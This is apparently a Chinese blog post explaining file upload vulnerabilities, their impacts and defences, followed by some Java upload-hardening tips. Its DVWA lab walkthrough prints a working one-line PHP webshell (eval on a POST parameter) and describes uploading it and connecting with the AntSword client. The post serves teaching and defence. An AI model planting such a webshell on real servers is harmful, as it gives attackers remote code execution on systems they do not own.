常见漏洞之upload

简介

  • 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上传木马,病毒,恶意脚本或者WebShell等可执行的动态脚本文件。
  • 原理
    在 WEB 中进行文件上传的原理是通过将表单设为 multipart/form-data,同时加入文件域,而后通过 HTTP 协议将文件内容发送到服务器,服务器端读取这个分段 (multipart) 的数据信息,并将其中的文件内容提取出来并保存的。通常,在进行文件保存的时候,服务器端会读取文件的原始文件名,并从这个原始文件名中得出文件的扩展名,而后随机为文件起一个文件名 ( 为了防止重复 ),并且加上原始文件的扩展名来保存到服务器上
  • 文件上传后导致的常见安全问题一般有
    上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行;
    上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似);
    上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行:
    上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。

漏洞利用

上传Web脚本程序,Web容器解释执行上传的恶意脚本。
上传Flash跨域策略文件crossdomain.xml,修改访问权限(其他策略文件利用方式类似)。
上传病毒、木马文件,诱骗用户和管理员下载执行。
上传包含脚本的图片,某些浏览器的低级版本会执行该脚本,用于钓鱼和欺诈。

如何防御

  • 文件上传的目录设置为不可执行
    只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本文件,服务器本身也不会受到影响,因此这一点至关重要。
  • 判断文件类型
    在判断文件类型时,可以结合使用MIME Type、后缀检查等方式。在文件类型检查中,强烈推荐白名单方式,黑名单的方式已经无数次被证明是不可靠的。此外,对于图片的处理,可以使用压缩函数或者resize函数,在处理图片的同时破坏图片中可能包含的HTML代码。
  • 使用随机数改写文件名和文件路径
    文件上传如果要执行代码,则需要用户能够访问到这个文件。在某些环境中,用户能上传,但不能访问。如果应用了随机数改写了文件名和路径,将极大地增加攻击的成本。再来就是像shell.php.rar.rar和crossdomain.xml这种文件,都将因为重命名而无法攻击。
  • 单独设置文件服务器的域名
    由于浏览器同源策略的关系,一系列客户端攻击将失效,比如上传crossdomain.xml、上传包含Javascript的XSS利用等问题将得到解决。

dvwa之upload(low)

先写一句话木马

<?php
eval($_POST['123']);	//密码123
?>

保存为PHP1.php,后缀名要改为php
上传文件
在这里插入图片描述
上传成功,然后使用蚁剑,添加数据
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述成功拿到后台根目录

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
下面是一个常见的解决方案,用于修复Java中的文件上传漏洞: 1. 验证文件类型:在接收文件上传时,不仅要验证文件扩展名,还应该检查文件的MIME类型。可以使用Java的MimeTypeMap类或Apache的Tika库进行验证。 ```java import org.apache.tika.Tika; String mimeType = new Tika().detect(file); if (!mimeType.startsWith("image/")) { // 非图片类型,拒绝上传 } ``` 2. 限制文件大小:在服务器端设置最大文件大小限制,以防止上传过大的文件。可以在应用程序的配置文件中配置最大文件大小,并在上传前检查文件大小。 ```java // 假设maxFileSize是允许的最大文件大小,单位为字节 if (file.getSize() > maxFileSize) { // 文件过大,拒绝上传 } ``` 3. 隔离上传目录:确保上传的文件存储在与应用程序代码和其他敏感数据隔离的目录中。最好使用一个独立的目录来存储上传的文件,并确保该目录不可通过Web访问。 ```java String uploadDirectory = "/path/to/upload/directory"; File saveFile = new File(uploadDirectory, fileName); // 保存上传文件到指定目录 ``` 4. 文件名处理:对上传的文件名进行处理,以防止路径遍历攻击和其他安全问题。可以使用正则表达式或字符串替换方法来删除或转义文件名中的特殊字符,并使用随机生成的文件名来保存上传的文件。 ```java String safeFileName = fileName.replaceAll("[^a-zA-Z0-9.-]", "_"); File saveFile = new File(uploadDirectory, safeFileName); // 保存上传文件到指定目录,使用安全的文件名 ``` 5. 安全权限设置:确保存储上传文件的目录具有适当的权限设置。限制对该目录的写入权限,并仅允许应用程序访问所需的文件。 ```bash chmod 700 /path/to/upload/directory ``` 6. 定期清理:定期检查上传目录并删除不再需要的文件。可以编写一个定时任务或脚本来清理过期或不再使用的上传文件。 这些解决方案可以帮助您修复Java中的文件上传漏洞。请记住,安全性是一个持续的过程,您可能还需要考虑其他安全措施,如防火墙、安全审计等。最重要的是,及时更新和修补您的应用程序以解决已知的安全漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值